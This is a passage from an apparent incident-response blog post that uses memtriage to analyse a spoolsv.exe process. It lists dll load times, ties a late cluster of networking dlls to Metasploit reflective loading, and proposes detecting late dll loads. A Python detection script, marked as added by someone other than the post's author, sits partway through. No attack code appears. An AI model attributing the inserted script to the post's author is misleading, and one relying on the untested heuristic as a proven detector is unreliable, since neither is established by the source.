style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\bcryptPrimitives.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\sspicli.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\clusapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cryptdll.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\advapi32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 
C:\Windows\System32\IPHLPAPI.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINNSI.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\mswsock.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\rasadhlp.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fwpuclnt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\localspl.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; 
font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\CRYPT32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\srvcli.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\cfgmgr32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\CRYPTSP.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPOOLSS.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; 
line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\WINTRUST.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SETUPAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\bcrypt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\MSASN1.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\DEVOBJ.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 
UTC+0000 C:\Windows\system32\winspool.drv</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\PrintIsolationProxy.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\tcpmon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\snmpapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsnmp32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\usbmon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); 
color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\OLEAUT32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WSDMon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsdapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\webservices.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FirewallAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\clbcatq.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FunDisc.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\XmlLite.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fdPnp.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\ATL.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: 
no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\drvstore.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\spool\PRTPROCS\x64\winprint.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\USERENV.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\profapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\gpapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\VERSION.dll</span></p><p 
class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DSROLE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\win32spl.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SHLWAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\DEVRTL.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPINF.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\rsaenh.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINSTA.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cscapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\netutils.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#fcff01">2020-07-19 13:45:05 UTC+0000 C:\Windows\System32\WTSAPI32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" 
style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\WININET.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\iertutil.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\WINHTTP.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc6.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\dhcpcsvc.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: 
no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\webio.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\PSAPI.DLL</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMM.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\WINMMBASE.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\ole32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 
UTC+0000 C:\Windows\System32\MPR.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\NETAPI32.dll</font></span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\wkscli.dll</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Take note of the load times for most of these dlls. Most are loaded shortly after the process starts. 
There's one outlier, </font><font face="courier">WTSAPI32.dll</font><font face="inherit">, and then there's a cluster of dlls loaded right around the time of our incident, 2020-07-19 20:04:32 UTC.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">But why are these dlls loaded? The PowerShell we saw showed a small bit of shellcode, and doesn't Metasploit do </span></font><a href="https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/" style="-webkit-text-stroke-width: 0px; font-family: inherit; font-style: normal; font-variant-caps: normal; font-variant-ligatures: no-common-ligatures; font-weight: 400; letter-spacing: normal; text-transform: none; white-space: normal; word-spacing: 0px;" target="_blank">reflective loading without writing to disk and without registering dlls in the process</a><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">? The answer is yes, for the Metasploit-specific dlls, but those dlls import functions from other system dlls, since the authors of Metasploit don't want to write everything from scratch</span></font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">. 
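Here is an added example of the late-load idea (my code, not the post's and not part of memtriage): it parses dll load lines in the format shown above, flags everything loaded more than a few minutes after the process started, and groups the late loads into bursts so a cluster like the one at 20:04:32 stands out from a lone straggler. The five-minute threshold and the sixty-second burst gap are assumptions, as is using the earliest load as a stand-in for the process start time (pslist would give the real one); the sample lines are a constructed subset of the listing above.

```python
"""Flag DLLs loaded long after their host process started and group the late
loads into bursts.  Added example, not code from the post; the input is a
constructed subset of the dlllist-style lines shown above."""
import re
from datetime import datetime, timedelta

# Constructed sample: a slice of the spoolsv.exe dll load list from the post.
SAMPLE_DLLLIST = r"""
2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\OLEAUT32.dll
2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WSDMon.dll
2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\netutils.dll
2020-07-19 13:45:05 UTC+0000 C:\Windows\System32\WTSAPI32.dll
2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\WININET.dll
2020-07-19 20:04:32 UTC+0000 C:\Windows\system32\iertutil.dll
2020-07-19 20:04:32 UTC+0000 C:\Windows\System32\WINHTTP.dll
2020-07-19 20:04:36 UTC+0000 C:\Windows\system32\PSAPI.DLL
2020-07-19 20:04:36 UTC+0000 C:\Windows\System32\wkscli.dll
""".strip()

# "<date> <time> UTC<offset> <path>", as printed in the listing above.
LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) UTC([+-]\d{4}) (.+)$")


def parse_dlllist(text):
    """Return [(load_time, path)] sorted by load time; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        stamp, offset, path = m.groups()
        when = datetime.strptime(f"{stamp} {offset}", "%Y-%m-%d %H:%M:%S %z")
        entries.append((when, path))
    return sorted(entries, key=lambda e: e[0])


def late_loads(entries, process_start=None, threshold=timedelta(minutes=5)):
    """Entries loaded more than `threshold` after the process started.

    Assumption: when no process start time is supplied, the earliest load in
    the list stands in for it (the real value would come from pslist).
    """
    if not entries:
        return []
    start = process_start or entries[0][0]
    return [e for e in entries if e[0] - start > threshold]


def cluster_loads(entries, gap=timedelta(seconds=60)):
    """Group time-sorted entries into bursts: a new burst starts whenever the
    next load is more than `gap` after the previous one."""
    bursts = []
    for entry in entries:
        if bursts and entry[0] - bursts[-1][-1][0] <= gap:
            bursts[-1].append(entry)
        else:
            bursts.append([entry])
    return bursts


def summarize(text):
    """One record per burst of late loads: first timestamp plus the dll names."""
    late = late_loads(parse_dlllist(text))
    return [
        (burst[0][0].strftime("%Y-%m-%d %H:%M:%S"),
         [path.rsplit("\\", 1)[-1] for _, path in burst])
        for burst in cluster_loads(late)
    ]


if __name__ == "__main__":
    for first_seen, names in summarize(SAMPLE_DLLLIST):
        print(f"{first_seen}  {len(names)} late load(s): {', '.join(names)}")
```

On the constructed sample this yields two bursts: WTSAPI32.dll on its own at 13:45:05, and five dlls within four seconds of each other at 20:04:32. A burst of several networking dlls appearing together hours after process start is the shape worth alerting on; a single late load is far more often routine.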
Those 13 late-loading dlls could make for a useful detection -- perhaps Sysmon should have a setting to log only late-loading dlls. Not all of them will be malicious (take the one outlier above), but logging late-loading dlls could cut the noise of logging every dll load.</span></font></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><br /></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;">Let's see if other <font face="courier">memtriage</font> plugins can shed more light on what's going on, starting with <font face="courier">malfind</font>, which looks for injected code in process memory. Here's the command I ran against the <font face="courier">spoolsv.exe</font> process, pid 1120:</div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><br /></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">.\memtriage.exe --pid 1120 --plugins malfind --output csv --outfile malfind.csv</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; 